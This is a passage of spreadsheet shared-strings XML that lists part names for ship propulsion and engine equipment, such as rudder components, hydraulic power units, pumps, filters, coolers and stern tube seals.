  <si>
    <t>Hex.cap screw for wire locking</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dividing pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seamless steel pipe ?200x10</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dividing pipe, fore</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stop flange, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stop flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pilot to open check valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve cylinder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo installation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ODL installation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Installations part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Securing device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Securing stud</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Support bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Feedback bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alpha clutcher assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alpha clutcher installation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo body</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ext. valve block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Conical bolt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch control parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic coupling parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Housing and bearings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intermediate shaft blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fixed nozzle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rudder nozzle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rudder stock</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rudder pintle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Steering quadrant</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kort nozzle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Extension nipple</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Special washer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Protection goggles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Standard tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting clamp</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blade ring - spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Special tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stud extractor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Loading mandrel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting bolt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing wear gauge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stress dial gauge set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dial gauge set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test pressure gauge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic power unit dimension</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Zero pitch unit, dimension</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency power unit EPU dim.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic power unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HPU 700</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HPU 1500</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HPU 2400</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Zero pitch unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EPU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tank plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Number plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Man hole cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Man hole ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HPU Pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Transfer pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pump plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AC Motor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Freshwater cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Saltwater cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic hose</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible chocks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve unit, mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check valve unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure control unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve block, casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connector A</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connector B</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure connector</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency handle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test pressure hose</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for relief valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Return filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sniffing filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clogging indicator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check bag</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flushing set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting plate for filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flushing bowl</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotor bracket complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotor complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Profile rail guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotor bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil cup</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slide bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotor rim, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotor rim</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotor cap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fluid level guage</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instruction emergency operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Assembly procedure ODF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ODF installation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Interface ODF-Gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ODF complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring for OD ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OD housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sensor housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cofferdam housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adaptor gear shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sensor housing, cast</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OD housing, cast</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil pipe - Master</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Attachment for throw off ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adapter for sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover for sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adapter gear housing - Master</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test equipment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Panel emergency tool complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Double head socket spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Foundation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAE butt weld flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAE counter flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAE split flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAE blind flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thread-weld connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rubber pad</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wiper seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sub plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test flange, mont.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lock pin</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Locking washer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blade foot protector</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil collector</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil collector, complet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spacer pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>T-piece</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reduction piece</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pibe bend</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fluid level gauge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Quick coupling air - male</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Quick coupling air - female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Weld connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arrow</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Toggle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bronze sliding bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Logo</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nylon plug</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inspection glass</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propulsion arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Foundation, engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Foundation, gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Foundation, engine / gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Resilient foundation, engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO arrangement, engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO arrangement, gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Foundation, alternator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propulsion arr. with marking</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Semi-elastic mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL SYSTEM, MDO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL DIAGRAM, HFO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATION OIL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING WATER DIAGRAM, SEPARATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING SYSTEM, CONVENTIONAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Work after test running</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plant information data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Output arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine lub oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear lub oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HT cooling water pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LT cooling water pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SW cooling water pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Preheater pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil priming pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>St-by pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine lub oil st-by pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear lub oil st-by pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil st-by pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil st-by pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HT cooling water st-by pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LT cooling water st-by pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SW cooling water st-by pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nozzle cooling oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefilter, nozzle cool. oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Heat exchanger f. nozzle cooling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Centrifugal pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefilter, MDO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefilter, HFO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefilter, lubricating oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>By-pass filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fine filter, lubricating oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fine filter w. pump, lub.oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Automatic lub oil filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefilter for fuel oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermostatic valve, LT system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermostatic valve, HT system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermoatatic valve, SW system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermostatic valve, lub. oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Controller f. thermostatic valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Resistance thermometer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mechanical regulation system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electronic temp. regulation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine lub oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear lub oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LT cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SW cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Anti-Fouling system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Heat exhanger</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HT preheater</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Jacket water preheater</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scavenge air drain tank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil compensator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible connection, fuel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible connection, air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible connection, lub. oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible connection, HT cooling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible connection, LT cooling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible hose, HFO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible connection, HFO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain pipe fore end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain pipe from cyl.frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Throttle insert pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling water connection, gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil pipe,intermediate sec.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plug for fuel valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Preheater for engine heating</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Silencer 25db w. spark arrester</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Silencer 35db w. spark arrester</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Silencer 25db</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Silencer 35db</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Silencer 45db w. spark arrester</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Silencer 45db</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for silencer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust gas compensator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust gas outlet, straight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust gas outlet, angled</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust gas outlet, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gasket for exhaust gas outlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Counter flange for gas outlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust gas outlet arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger rotor, spare</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger bearings, spare</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger house, spare</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compressor cleaning arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange for TCR18</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange for TCR 20</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compressor, starting air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compressor, working air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air supply unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air pressure reduction unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Starting air reciever</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain valve for starting air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MDO module</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MDO centrifuge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HFO module</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HFO centrifuge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Separator flow control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubricating oil centrifuge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil automatic filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clarifier disc</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air cooling cleaning unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air dehydration</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instr. manual, journal bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Roller bearing, radial</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fitted bolt, oversize</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adapter flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Carbon ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instr. manual, bulkhead seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pump unit for shaft seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wear down gauge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Liner for stern tube seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seal drain tank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air control unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft locking device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring for locking device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Silver graphite brush</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Torquemeter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instruction manual torquemeter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Welded pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange, rough machined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Split alignment ring for guard</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing bush - complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain pipe for aft seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air supply pipe for aft seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adapter flange for shaft seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Distance piece f. servo oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
